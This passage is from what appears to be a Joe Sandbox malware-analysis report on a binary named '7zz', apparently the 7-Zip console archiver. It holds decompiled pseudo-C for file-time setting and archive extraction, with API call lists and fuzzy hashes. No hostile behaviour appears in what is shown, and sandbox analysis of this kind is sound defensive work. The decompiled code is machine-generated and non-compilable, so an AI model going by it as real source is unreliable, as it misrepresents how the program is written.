					if( *(_t52 - 0x10) != 0xffffffff) {
						_t28 = SetFileTime( *(_t52 - 0x10),  *(_t52 - 0x18),  *(_t52 + 8),  *(_t52 + 0xc)); // executed
						_t37 = 0 | _t28 != 0x00000000;
						CloseHandle( *(_t52 - 0x10));
					}
					_t27 = _t37;
				} else {
					SetLastError(0x78);
					_t27 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t27;
			}








                                                                      0x004098d4
                                                                      0x004098e3
                                                                      0x004098e6
                                                                      0x004098e9
                                                                      0x00409918
                                                                      0x0040991d
                                                                      0x00409920
                                                                      0x00409929
                                                                      0x0040992c
                                                                      0x0040992f
                                                                      0x00409932
                                                                      0x0040993a
                                                                      0x00409948
                                                                      0x00409959
                                                                      0x00409959
                                                                      0x0040995f
                                                                      0x00409964
                                                                      0x00409965
                                                                      0x0040996b
                                                                      0x00409979
                                                                      0x00409984
                                                                      0x00409987
                                                                      0x00409987
                                                                      0x0040998e
                                                                      0x004098eb
                                                                      0x004098ed
                                                                      0x004098f3
                                                                      0x004098f3
                                                                      0x00409995
                                                                      0x0040999d

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 004098D4
                                                                      • SetLastError.KERNEL32(00000078), ref: 004098ED
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409918
                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,00000003,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409957
                                                                      • SetFileTime.KERNELBASE(000000FF,?,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409979
                                                                      • CloseHandle.KERNEL32(000000FF,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409987
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: File$Create$CloseErrorH_prologHandleLastTime
                                                                      • String ID:
                                                                      • API String ID: 1562325489-0
                                                                      • Opcode ID: a5c80a9bf8aac4bebe81e0320b0504ece2bb406e11bd7c606f3c9c216bf877a2
                                                                      • Instruction ID: e76a05e07f1340f2f4d5a0f82b1dd14c97c15875a5f06524ffc792fdba8d9db0
                                                                      • Opcode Fuzzy Hash: a5c80a9bf8aac4bebe81e0320b0504ece2bb406e11bd7c606f3c9c216bf877a2
                                                                      • Instruction Fuzzy Hash: 7E218C71940209AAEF11AFA4DC02BEEBBB8EF48710F10453AE514B62E1D3790E00CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00412027 Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 954COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 81%
                                                                      			E00412027() {
				void* __ebx;
				void* __esi;
				intOrPtr* _t416;
				signed int _t418;
				signed int _t422;
				signed int _t425;
				signed int _t429;
				signed int _t434;
				signed int _t440;
				signed int _t461;
				signed int _t462;
				signed int _t474;
				signed int _t475;
				void* _t476;
				signed int _t479;
				signed int _t480;
				signed int _t490;
				void* _t508;
				signed int _t511;
				intOrPtr* _t512;
				signed int _t515;
				intOrPtr _t516;
				void* _t517;
				void* _t518;
				signed int _t522;
				void* _t533;
				void* _t534;
				void* _t536;
				signed int _t540;
				signed int _t559;
				void* _t570;
				void* _t571;
				signed int _t575;
				signed int _t584;
				signed int _t585;
				signed int _t589;
				signed int _t593;
				intOrPtr _t627;
				signed int _t628;
				void* _t633;
				signed int _t637;
				void* _t643;
				signed int _t651;
				intOrPtr _t681;
				signed int _t754;
				intOrPtr _t791;
				FILETIME* _t793;
				intOrPtr* _t796;
				signed int* _t797;
				intOrPtr* _t798;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t804;
				signed int _t805;
				signed int _t808;
				signed int _t810;
				signed int _t812;
				intOrPtr* _t813;
				signed int _t814;
				intOrPtr* _t815;
				intOrPtr* _t816;
				signed int _t817;
				intOrPtr* _t818;
				intOrPtr* _t819;
				signed int _t821;
				void* _t822;
				void* _t824;

				E0046B890(E0047455B, _t822);
				_t810 =  *(_t822 + 8);
				_t651 = 0;
				 *((intOrPtr*)(_t822 - 0x10)) = _t824 - 0x9c;
				_t416 =  *((intOrPtr*)(_t810 + 0xa0));
				_t796 = _t810 + 0xa0;
				 *((intOrPtr*)(_t822 - 4)) = 0;
				if(_t416 != 0) {
					 *((intOrPtr*)( *_t416 + 8))(_t416);
					 *_t796 = 0;
				}
				_t797 = _t810 + 0x98;
				 *( *(_t822 + 0x10)) = _t651;
				_t418 =  *_t797;
				if(_t418 != _t651) {
					 *((intOrPtr*)( *_t418 + 8))(_t418);
					 *_t797 = _t651;
				}
				 *(_t810 + 0x88) = _t651;
				 *(_t810 + 0x5d) = _t651;
				 *(_t810 + 0x58) = _t651;
				 *(_t810 + 0x8c) = _t651;
				 *(_t810 + 0x90) = _t651;
				 *(_t810 + 0x84) =  *(_t822 + 0xc);
				 *(_t822 - 0x48) = _t651;
				 *(_t822 - 0x44) = _t651;
				 *(_t822 - 0x40) = _t651;
				E00401E9A(_t822 - 0x48, 3);
				_push(_t822 - 0x48);
				 *((char*)(_t822 - 4)) = 1;
				_push( *(_t822 + 0xc));
				_t798 =  *((intOrPtr*)( *((intOrPtr*)(_t810 + 0x10))));
				_t422 = E004179F7( *((intOrPtr*)(_t810 + 0x10)));
				if(_t422 == _t651) {
					_t422 = E004179E9(_t810 + 0x80);
					__eflags = _t422 - _t651;
					if(_t422 != _t651) {
						goto L5;
					}
					E00401E26(_t810 + 0x44, _t822 - 0x48);
					 *(_t822 - 0x70) = _t651;
					 *(_t822 - 0x6e) = _t651;
					 *((char*)(_t822 - 4)) = 2;
					_t429 =  *((intOrPtr*)( *_t798 + 0x18))(_t798,  *(_t822 + 0xc), 0x1d, _t822 - 0x70);
					__eflags = _t429 - _t651;
					 *(_t822 + 8) = _t429;
					if(_t429 == _t651) {
						__eflags =  *(_t822 - 0x70) - _t651;
						if( *(_t822 - 0x70) == _t651) {
							L13:
							 *((char*)(_t822 - 4)) = 1;
							E0040C20F(_t822 - 0x70);
							_push(_t810 + 0x5d);
							_push(0xf);
							_t422 = E00417975(_t798,  *(_t822 + 0xc));
							__eflags = _t422 - _t651;
							if(_t422 != _t651) {
								goto L5;
							}
							_t422 = E00411FA9(_t810);
							__eflags = _t422 - _t651;
							if(_t422 != _t651) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(_t810 + 0x14)) - _t651;
							if( *((intOrPtr*)(_t810 + 0x14)) == _t651) {
								L17:
								__eflags =  *(_t822 + 0x14) - _t651;
								if( *(_t822 + 0x14) != _t651) {
									L146:
									 *( *(_t822 + 0x10)) = _t651;
									L147:
									__eflags =  *((intOrPtr*)(_t810 + 0xba)) - _t651;
									if( *((intOrPtr*)(_t810 + 0xba)) != _t651) {
										_push(0x20);
										_t434 = E004079F2();
										__eflags = _t434 - _t651;
										if(_t434 == _t651) {
											_t434 = 0;
											__eflags = 0;
										} else {
											 *(_t434 + 4) = _t651;
											 *(_t434 + 8) = _t651;
											 *_t434 = 0x47aa54;
										}
										 *(_t810 + 0x9c) = _t434;
										E0040C9B4(_t810 + 0xa0, _t434);
										_t800 =  *(_t810 + 0x9c);
										__eflags = _t800 - _t651;
										 *(_t822 + 0xc) = _t800;
										if(_t800 != _t651) {
											 *((intOrPtr*)( *_t800 + 4))(_t800);
										}
										 *((char*)(_t822 - 4)) = 0x2c;
										E0040C9B4( *(_t810 + 0x9c) + 8,  *( *(_t822 + 0x10)));
										_t440 =  *( *(_t822 + 0x10));
										__eflags = _t440 - _t651;
										if(_t440 != _t651) {
											 *((intOrPtr*)( *_t440 + 8))(_t440);
										}
										 *( *(_t822 + 0x10)) = _t800;
										_t812 =  *(_t810 + 0x9c);
										_t407 = _t812 + 0x18;
										 *_t407 =  *(_t812 + 0x18) | 0xffffffff;
										__eflags =  *_t407;
										 *(_t812 + 0x10) = _t651;
										 *(_t812 + 0x14) = _t651;
										 *((char*)(_t812 + 0x1c)) = 1;
									}
									L156:
									E00407A18( *(_t822 - 0x48));
									_t425 = 0;
									L157:
									 *[fs:0x0] =  *((intOrPtr*)(_t822 - 0xc));
									return _t425;
								}
								__eflags =  *((intOrPtr*)(_t810 + 0xb9)) - _t651;
								if( *((intOrPtr*)(_t810 + 0xb9)) != _t651) {
									goto L146;
								}
								__eflags =  *((intOrPtr*)(_t810 + 0xb8)) - _t651;
								if( *((intOrPtr*)(_t810 + 0xb8)) == _t651) {
									 *(_t822 - 0x70) = _t651;
									 *(_t822 - 0x6e) = _t651;
									 *((char*)(_t822 - 4)) = 3;
									_t801 =  *((intOrPtr*)( *_t798 + 0x18))(_t798,  *(_t822 + 0xc), 9, _t822 - 0x70);
									__eflags = _t801 - _t651;
									if(_t801 == _t651) {
										__eflags =  *(_t822 - 0x70) - 0x13;
										if( *(_t822 - 0x70) != 0x13) {
											__eflags =  *(_t822 - 0x70) - _t651;
											if( *(_t822 - 0x70) != _t651) {
												 *((char*)(_t822 - 4)) = 1;
												E0040C20F(_t822 - 0x70);
												_t801 = 0x80004005;
												L145:
												E00407A18( *(_t822 - 0x48));
												_t425 = _t801;
												goto L157;
											}
											 *(_t810 + 0x7f) = _t651;
											L32:
											 *((char*)(_t822 - 4)) = 1;
											E0040C20F(_t822 - 0x70);
											_t802 =  *(_t822 + 0xc);
											_push(_t810 + 0x7c);
											_push(_t810 + 0x60);
											_push(0xa);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											_push(_t810 + 0x7d);
											_push(_t810 + 0x68);
											_push(0xb);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											_push(_t810 + 0x7e);
											_push(_t810 + 0x70);
											_push(0xc);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											 *(_t822 + 0xb) = _t651;
											_push(_t822 + 0xb);
											_push(0x15);
											_t422 = E00417975( *((intOrPtr*)( *((intOrPtr*)(_t810 + 0x10)))), _t802);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											E00405B9F(_t822 - 0x24);
											_t803 = 0x47a420;
											 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
											 *((char*)(_t822 - 4)) = 4;
											E00408833(_t822 - 0x48, _t822 - 0x24, __eflags);
											_t681 =  *((intOrPtr*)(_t822 - 0x1c));
											__eflags = _t681 - _t651;
											if(_t681 != _t651) {
												 *(_t822 + 0xc) = _t651;
												_t461 =  *((intOrPtr*)(_t810 + 0x30)) - 1;
												__eflags = _t461;
												if(_t461 == 0) {
													_t462 =  *(_t810 + 0xac);
													__eflags = _t681 - _t462;
													 *(_t822 + 0xc) = _t462;
													if(_t681 > _t462) {
														_t804 = 0;
														__eflags = 0;
														while(1) {
															__eflags = _t804 -  *(_t822 + 0xc);
															if(_t804 >=  *(_t822 + 0xc)) {
																break;
															}
															_t633 = E0040807A( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t822 - 0x18)) + _t804 * 4)))));
															__eflags = _t633 - _t651;
															if(_t633 == _t651) {
																_t804 = _t804 + 1;
																continue;
															}
															 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
															 *((char*)(_t822 - 4)) = 7;
															L89:
															E0040862D();
															 *((char*)(_t822 - 4)) = 1;
															E00408604(_t822 - 0x24);
															_t651 = 0x80004005;
															L141:
															E00407A18( *(_t822 - 0x48));
															_t425 = _t651;
															goto L157;
														}
														_t803 = 0x47a420;
														L49:
														E004036D9(_t651, _t822 - 0x24, _t810, _t651,  *(_t822 + 0xc));
														E00416D6F(_t822 - 0x24);
														E004170F2(_t822 - 0x3c, _t822 - 0x24, __eflags);
														__eflags =  *(_t822 + 0xb) - _t651;
														 *((char*)(_t822 - 4)) = 8;
														if( *(_t822 + 0xb) != _t651) {
															L71:
															_t772 = _t810 + 0x24;
															_push(_t822 - 0x3c);
															E0040B0A0(_t822 - 0x30, _t810 + 0x24);
															__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
															 *((char*)(_t822 - 4)) = 0xa;
															if( *((intOrPtr*)(_t810 + 0x80)) == _t651) {
																__eflags =  *(_t810 + 0x58) - _t651;
																if( *(_t810 + 0x58) != _t651) {
																	L117:
																	__eflags =  *(_t822 + 0xb) - _t651;
																	if( *(_t822 + 0xb) != _t651) {
																		L143:
																		E00401E26(_t810 + 0x38, _t822 - 0x30);
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																		 *((char*)(_t822 - 4)) = 0x2b;
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		goto L147;
																	}
																	_push(0x20);
																	_t474 = E004079F2();
																	__eflags = _t474 - _t651;
																	if(_t474 == _t651) {
																		_t805 = 0;
																		__eflags = 0;
																	} else {
																		 *(_t474 + 4) = _t651;
																		 *(_t474 + 8) =  *(_t474 + 8) | 0xffffffff;
																		 *_t474 = 0x47aa64;
																		_t805 = _t474;
																	}
																	__eflags = _t805 - _t651;
																	 *(_t810 + 0x94) = _t805;
																	 *(_t822 + 0x14) = _t805;
																	if(_t805 != _t651) {
																		 *((intOrPtr*)( *_t805 + 4))(_t805);
																	}
																	_t475 =  *(_t810 + 0x94);
																	 *((char*)(_t822 - 4)) = 0x26;
																	asm("sbb edx, edx");
																	 *(_t475 + 0x18) = _t651;
																	 *(_t475 + 0x1c) = _t651;
																	_t476 = L0040BD54( *((intOrPtr*)(_t822 - 0x30)), ( ~( *(_t810 + 0x58)) & 0x00000002) + 2);
																	__eflags = _t476 - _t651;
																	if(_t476 != _t651) {
																		__eflags =  *(_t810 + 0x58) - _t651;
																		if( *(_t810 + 0x58) == _t651) {
																			L142:
																			E0040C9B4(_t810 + 0x98, _t805);
																			 *((char*)(_t822 - 4)) = 0xa;
																			 *( *(_t822 + 0x10)) = _t805;
																			_t803 = 0x47a420;
																			goto L143;
																		}
																		_t479 =  *(_t810 + 0x94);
																		_t480 =  *((intOrPtr*)( *_t479 + 0x10))(_t479,  *((intOrPtr*)(_t810 + 0x50)),  *((intOrPtr*)(_t810 + 0x54)), _t651, _t651);
																		__eflags = _t480 - _t651;
																		 *(_t822 + 0xc) = _t480;
																		if(_t480 == _t651) {
																			goto L142;
																		}
																		__eflags = _t805 - _t651;
																		 *((char*)(_t822 - 4)) = 0xa;
																		if(_t805 != _t651) {
																			 *((intOrPtr*)( *_t805 + 8))(_t805);
																		}
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x2a;
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		_t651 =  *(_t822 + 0xc);
																	} else {
																		E00412FDC(_t822 - 0x60, L"can not open output file ");
																		_t813 =  *((intOrPtr*)(_t810 + 0x18));
																		 *((char*)(_t822 - 4)) = 0x27;
																		_t490 =  *((intOrPtr*)( *_t813 + 0x1c))(_t813,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																		_push( *((intOrPtr*)(_t822 - 0x60)));
																		_t814 = _t490;
																		__eflags = _t814 - _t651;
																		if(_t814 == _t651) {
																			E00407A18();
																			__eflags = _t805 - _t651;
																			 *((char*)(_t822 - 4)) = 0xa;
																			if(_t805 != _t651) {
																				 *((intOrPtr*)( *_t805 + 8))(_t805);
																			}
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x29;
																			L94:
																			E0040862D();
																			 *((char*)(_t822 - 4)) = 1;
																			E00408604(_t822 - 0x24);
																			goto L141;
																		}
																		E00407A18();
																		__eflags = _t805 - _t651;
																		 *((char*)(_t822 - 4)) = 0xa;
																		if(_t805 != _t651) {
																			 *((intOrPtr*)( *_t805 + 8))(_t805);
																		}
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x28;
																		L123:
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		_t651 = _t814;
																	}
																	goto L141;
																}
																E0040351A(_t822 - 0x80);
																_push( *((intOrPtr*)(_t822 - 0x30)));
																 *((char*)(_t822 - 4)) = 0xc;
																_t508 = E0040B431(_t822 - 0xa8, _t772, __eflags); // executed
																__eflags = _t508 - _t651;
																if(_t508 == _t651) {
																	L116:
																	 *((char*)(_t822 - 4)) = 0xa;
																	E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																	goto L117;
																}
																_t511 =  *((intOrPtr*)(_t810 + 0x34)) - _t651;
																__eflags = _t511;
																if(_t511 == 0) {
																	asm("sbb edx, edx");
																	_t512 =  *((intOrPtr*)(_t810 + 0x18));
																	asm("sbb edx, edx");
																	_t808 =  *((intOrPtr*)( *_t512 + 0x14))(_t512,  *((intOrPtr*)(_t822 - 0x30)), _t822 - 0x90, _t822 - 0xa8,  *(_t822 - 0x48),  ~( *(_t810 + 0x7e)) & _t810 + 0x00000070,  ~( *(_t810 + 0x90)) & _t810 + 0x00000088, _t822 + 0xc);
																	__eflags = _t808 - _t651;
																	if(_t808 == _t651) {
																		_t515 =  *(_t822 + 0xc) - _t651;
																		__eflags = _t515;
																		if(_t515 == 0) {
																			L96:
																			_t803 = 0x47a420;
																			L97:
																			_t516 =  *((intOrPtr*)(_t810 + 0x34));
																			__eflags = _t516 - 3;
																			if(__eflags != 0) {
																				__eflags = _t516 - 4;
																				if(_t516 != 4) {
																					_t517 = E00409F99( *((intOrPtr*)(_t822 - 0x30)));
																					__eflags = _t517 - _t651;
																					if(_t517 != _t651) {
																						goto L116;
																					}
																					_t518 = E00403532(_t822 - 0x6c,  *0x48bd9c);
																					 *((char*)(_t822 - 4)) = 0x21;
																					E0040B0A0(_t822 - 0x60, _t518);
																					 *((char*)(_t822 - 4)) = 0x23;
																					E00407A18( *((intOrPtr*)(_t822 - 0x6c)));
																					_t815 =  *((intOrPtr*)(_t810 + 0x18));
																					_t522 =  *((intOrPtr*)( *_t815 + 0x1c))(_t815,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																					_push( *((intOrPtr*)(_t822 - 0x60)));
																					_t814 = _t522;
																					__eflags = _t814 - _t651;
																					if(_t814 == _t651) {
																						E00407A18();
																						E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																						 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																						 *((char*)(_t822 - 4)) = 0x25;
																						goto L94;
																					}
																					E00407A18();
																					E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x24;
																					goto L123;
																				}
																				E004039C0(_t822 - 0x54, _t822 - 0x30);
																				 *((char*)(_t822 - 4)) = 0x18;
																				_t533 = E0040CD50(_t822 - 0x54, __eflags);
																				__eflags = _t533 - _t651;
																				if(_t533 != _t651) {
																					_t534 = E00409BC3( *((intOrPtr*)(_t822 - 0x30)),  *(_t822 - 0x54));
																					__eflags = _t534 - _t651;
																					if(_t534 != _t651) {
																						E00407A18( *(_t822 - 0x54));
																						goto L116;
																					}
																					_t536 = E00403532(_t822 - 0x6c,  *0x48bd98);
																					 *((char*)(_t822 - 4)) = 0x1c;
																					E0040B0A0(_t822 - 0x60, _t536);
																					 *((char*)(_t822 - 4)) = 0x1e;
																					E00407A18( *((intOrPtr*)(_t822 - 0x6c)));
																					_t816 =  *((intOrPtr*)(_t810 + 0x18));
																					_t540 =  *((intOrPtr*)( *_t816 + 0x1c))(_t816,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																					_push( *((intOrPtr*)(_t822 - 0x60)));
																					_t817 = _t540;
																					__eflags = _t817 - _t651;
																					if(_t817 == _t651) {
																						E00407A18();
																						E00407A18( *(_t822 - 0x54));
																						E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																						 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																						 *((char*)(_t822 - 4)) = 0x20;
																						L112:
																						E0040862D();
																						 *((char*)(_t822 - 4)) = 1;
																						E00408604(_t822 - 0x24);
																						L113:
																						_t817 = 0x80004005;
																						L114:
																						E00407A18( *(_t822 - 0x48));
																						_t425 = _t817;
																						goto L157;
																					}
																					E00407A18();
																					E00407A18( *(_t822 - 0x54));
																					E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x1f;
																					L110:
																					E0040862D();
																					 *((char*)(_t822 - 4)) = 1;
																					E00408604(_t822 - 0x24);
																					goto L114;
																				}
																				_t791 =  *0x48bd94; // 0x48be34
																				E00412FDC(_t822 - 0x60, _t791);
																				_t818 =  *((intOrPtr*)(_t810 + 0x18));
																				 *((char*)(_t822 - 4)) = 0x19;
																				_t559 =  *((intOrPtr*)( *_t818 + 0x1c))(_t818,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																				_push( *((intOrPtr*)(_t822 - 0x60)));
																				_t817 = _t559;
																				__eflags = _t817 - _t651;
																				if(_t817 == _t651) {
																					E00407A18();
																					E00407A18( *(_t822 - 0x54));
																					E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x1b;
																					goto L112;
																				}
																				E00407A18();
																				E00407A18( *(_t822 - 0x54));
																				E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																				 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																				 *((char*)(_t822 - 4)) = 0x1a;
																				goto L110;
																			}
																			_t570 = E0040CD50(_t822 - 0x30, __eflags);
																			__eflags = _t570 - _t651;
																			if(_t570 != _t651) {
																				goto L116;
																			}
																			_t571 = E00403532(_t822 - 0x60,  *0x48bd94);
																			 *((char*)(_t822 - 4)) = 0x13;
																			E0040B0A0(_t822 - 0x54, _t571);
																			 *((char*)(_t822 - 4)) = 0x15;
																			E00407A18( *((intOrPtr*)(_t822 - 0x60)));
																			_t819 =  *((intOrPtr*)(_t810 + 0x18));
																			_t575 =  *((intOrPtr*)( *_t819 + 0x1c))(_t819,  *(_t822 - 0x54), _t822 - 0x30);
																			_push( *(_t822 - 0x54));
																			_t817 = _t575;
																			__eflags = _t817 - _t651;
																			if(_t817 == _t651) {
																				E00407A18();
																				E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																				 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																				 *((char*)(_t822 - 4)) = 0x17;
																				goto L112;
																			}
																			E00407A18();
																			E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																			 *((char*)(_t822 - 4)) = 0x16;
																			goto L110;
																		}
																		_t584 = _t515 - 1;
																		__eflags = _t584;
																		if(_t584 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 1;
																			goto L96;
																		}
																		_t585 = _t584 - 1;
																		__eflags = _t585;
																		if(_t585 == 0) {
																			E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x10;
																			goto L94;
																		}
																		_t589 = _t585 - 1;
																		__eflags = _t589;
																		if(_t589 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 2;
																			E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x11;
																			goto L94;
																		}
																		_t593 = _t589 - 1;
																		__eflags = _t593;
																		if(_t593 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 3;
																			goto L96;
																		}
																		_push( *((intOrPtr*)(_t822 - 0x80)));
																		__eflags = _t593 == 1;
																		if(_t593 == 1) {
																			E00407A18();
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0xf;
																			E0040862D();
																			 *((char*)(_t822 - 4)) = 1;
																			E00408604(_t822 - 0x24);
																			_t651 = 0x80004004;
																			goto L141;
																		}
																		E00407A18();
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x12;
																		goto L89;
																	}
																	E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																	E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																	E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																	 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																	 *((char*)(_t822 - 4)) = 0xe;
																	E0040862D();
																	 *((char*)(_t822 - 4)) = 1;
																	E00408604(_t822 - 0x24);
																	_t651 = _t808;
																	goto L141;
																}
																__eflags = _t511 != 0;
																if(_t511 != 0) {
																	goto L97;
																}
																E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																 *((char*)(_t822 - 4)) = 0xd;
																E0040862D();
																 *((char*)(_t822 - 4)) = 1;
																E00408604(_t822 - 0x24);
																goto L156;
															}
															_t820 = _t810 + 0x38;
															E00401E26(_t810 + 0x38, _t822 - 0x30);
															__eflags =  *(_t822 + 0xb) - _t651;
															if( *(_t822 + 0xb) != _t651) {
																E00409B24( *_t820);
															}
															E00407A18( *((intOrPtr*)(_t822 - 0x30)));
															E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
															 *((intOrPtr*)(_t822 - 0x24)) = _t803;
															 *((char*)(_t822 - 4)) = 0xb;
															goto L94;
														}
														__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
														if( *((intOrPtr*)(_t810 + 0x80)) != _t651) {
															L53:
															__eflags =  *((intOrPtr*)(_t822 - 0x1c)) - _t651;
															if( *((intOrPtr*)(_t822 - 0x1c)) == _t651) {
																goto L71;
															}
															 *(_t822 - 0x54) = _t651;
															 *(_t822 - 0x50) = _t651;
															 *(_t822 - 0x4c) = _t651;
															E00401E9A(_t822 - 0x54, 3);
															_push(_t822 - 0x54);
															 *((char*)(_t822 - 4)) = 9;
															E00411ED0(_t810, _t822, _t822 - 0x24);
															__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
															if( *((intOrPtr*)(_t810 + 0x80)) == _t651) {
																L70:
